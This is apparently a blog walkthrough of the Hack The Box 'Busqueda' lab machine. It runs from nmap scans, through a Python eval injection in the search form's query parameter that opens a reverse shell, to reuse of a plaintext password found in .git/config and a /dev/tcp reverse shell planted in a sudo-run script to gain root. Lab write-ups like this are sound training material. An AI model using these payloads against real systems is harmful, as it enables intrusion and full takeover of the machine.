Busqueda靶机
n3ym4r
  2023-04-15 18:09:00 2023-04-15 18:09   2023-04-15 10:09:44    1.4k 字  7 分钟

nmap扫描

┌──(n3ym4r㉿kali)-[~]                                                       
└─$ nmap 10.10.11.208                                                        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 15:41 CST              
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan  
Connect Scan Timing: About 99.99% done; ETC: 15:43 (0:00:00 remaining)       
Nmap scan report for 10.10.11.208                                            
Host is up (0.90s latency).                                                  
Not shown: 998 closed tcp ports (conn-refused)                               
PORT   STATE SERVICE                                                         
22/tcp open  ssh                                                             
80/tcp open  http                                                            
                                                                             
Nmap done: 1 IP address (1 host up) scanned in 118.88 seconds 

┌──(n3ym4r㉿kali)-[~]
└─$ sudo nmap 10.10.11.208 -sC -sV -O -p22,80
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 15:53 CST
Nmap scan report for 10.10.11.208
Host is up (0.82s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 4.15 - 5.6 (93%), Linux 5.4 (93%), Android 4.1.1 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.40 seconds

22、80端口开放,在/etc/hosts中添加searcher.htb,访问web端

Web端漏洞发现

image

查看页脚可以看到由searchor驱动

https://github.com/ArjunSharda/Searchor

作用为使用指定的搜索引擎搜索信息,那么可以让它重定向到我们的ip

bp抓包

POST /search HTTP/1.1
Host: searcher.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://searcher.htb
Connection: close
Referer: http://searcher.htb/
Upgrade-Insecure-Requests: 1

engine=Youtube&query=1111

可以看到有两个参数,那么可以尝试在参数位置写入我们的payload

漏洞利用

本地建立监听

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 4444               
listening on [any] 4444 ...

修改bp数据包

POST /search HTTP/1.1
Host: searcher.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 311
Origin: http://searcher.htb
Connection: close
Referer: http://searcher.htb/
Upgrade-Insecure-Requests: 1

engine=BBC&query=ddd'%2beval(compile('for%20x%20in%20range(1)%3a%5cn%20import%20time%5cn%20import%20socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.7",4444));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'%2c'a'%2c'single'))%2b'

反弹成功

┌──(n3ym4r㉿kali)-[~]
└─$ sudo nc -nvlp 4444 
[sudo] n3ym4r 的密码:
listening on [any] 4444 ...



connect to [10.10.16.7] from (UNKNOWN) [10.10.11.208] 57632
/bin/sh: 0: can't access tty; job control turned off
$ $ $ $ 

$ $ $ $ python3 -c 'import pty; pty.spawn("/bin/bash")'
svc@busqueda:/var/www/app$ whoami
whoami
svc
svc@busqueda:/var/www/app$ cd
cd
svc@busqueda:~$ ls
ls
snap  user.txt
svc@busqueda:~$ cat user.txt
cat user.txt
096886c4a46a05675658f26bbaef429f
svc@busqueda:~$

python3 -c 'import pty; pty.spawn("/bin/bash")'提升shell交互性,找到user flag

提权

到处查找信息

svc@busqueda:/var/www/app$ ls -al
ls -al
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3 14:32 .
drwxr-xr-x 4 root     root     4096 Apr  4 16:02 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1 14:22 app.py
drwxr-xr-x 8 www-data www-data 4096 Apr 15 03:25 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1 14:35 templates
svc@busqueda:/var/www/app$ cd .git
cd .git
svc@busqueda:/var/www/app/.git$ ls
ls
branches        config       HEAD   index  logs     refs
COMMIT_EDITMSG  description  hooks  info   objects
svc@busqueda:/var/www/app/.git$ cat config
cat config
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
    remote = origin
    merge = refs/heads/main
svc@busqueda:/var/www/app/.git$

在www/app/.git/config下看到疑似密码的字符串,尝试一下

sudo -l

svc@busqueda:/var/www/app/.git$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92

Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
svc@busqueda:/var/www/app/.git$

可以看到当前用户是可以运行一个名为system-checkup.py *的脚本

我们无法读取脚本信息,尝试运行能看到一些信息

svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup

在/tmp文件夹下新建一个full-checkup.sh

cd /tmp
svc@busqueda:/tmp$ cat full-checkup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.7/1234 0>&1
svc@busqueda:/tmp$ chmod +x full-checkup.sh
svc@busqueda:/tmp$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

新建一个监听

┌──(n3ym4r㉿kali)-[~]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.208] 45004
root@busqueda:/tmp# whoami
whoami
root
root@busqueda:/tmp# ls
ls
pee
poo
snap-private-tmp
systemd-private-6591c6e8ee094027a315ba6425f4dca2-apache2.service-SfEkK1
systemd-private-6591c6e8ee094027a315ba6425f4dca2-ModemManager.service-zSf6WS
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-logind.service-G8ik4Z
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-resolved.service-HSkC2C
systemd-private-6591c6e8ee094027a315ba6425f4dca2-systemd-timesyncd.service-xA7W3d
systemd-private-6591c6e8ee094027a315ba6425f4dca2-upower.service-fuvS6w
tmux-1000
vmware-root_841-4013329999
root@busqueda:/tmp# cd
cd
root@busqueda:~# ls
ls
ecosystem.config.js
root.txt
scripts
snap
root@busqueda:~# cat root.txt
cat root.txt
6df616616ffeb8d7982621ba4603295d
root@busqueda:~#

得到root shell,找到root flag

  • 本文标题:Busqueda靶机
  • 本文作者:n3ym4r
  • 创建时间:2023-04-15 18:09:00
  • 本文链接:https://n3ym4r.github.io/2023/04/15/Busqueda/
  • 版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!